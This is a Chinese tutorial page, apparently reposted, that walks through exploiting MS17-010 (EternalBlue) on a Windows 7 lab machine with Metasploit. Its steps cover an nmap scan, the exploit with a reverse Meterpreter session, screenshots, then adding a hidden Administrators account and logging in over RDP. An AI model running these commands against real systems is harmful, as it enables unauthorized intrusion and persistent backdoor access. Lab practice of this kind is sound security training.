• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

永恒:蓝ms17010漏洞

武飞扬头像
安名然
帮助5

目录

1.启动msf

2.检查msf库里是否存在ms17-010漏洞

3.扫描靶机开放端口

4.配置目标ip,本地ip并利用exploit进行攻击

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

6.获得shell控制台进cmd操作,添加账户提升权限

7.远程登录靶机

8.输入添加的账户密码,登录成功


环境:

攻击机:kali  192.168.10.2           靶机:win7  192.168.10.3

1.启动msf

# msfconsole

2.检查msf库里是否存在ms17-010漏洞

msf6 > search ms17

学新通

3.扫描靶机开放端口

# nmap -sV 192.168.10.3

学新通

4.配置目标ip,本地ip并利用exploit进行攻击

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.2
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

学新通

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

meterpreter > sysinfo
meterpreter > getuid
meterpreter > screenshot

学新通

6.获得shell控制台进cmd操作,添加账户提升权限

meterpreter > shell
C:\Windows\system32>net user lql 123456 /add
C:\Windows\system32>net localgroup Administrators lql /add

学新通

7.远程登录靶机

# rdesktop 192.168.10.3:3389

学新通

8.输入添加的账户密码,登录成功

学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhfbaehc
系列文章
更多 icon
同类精品
更多 icon
继续加载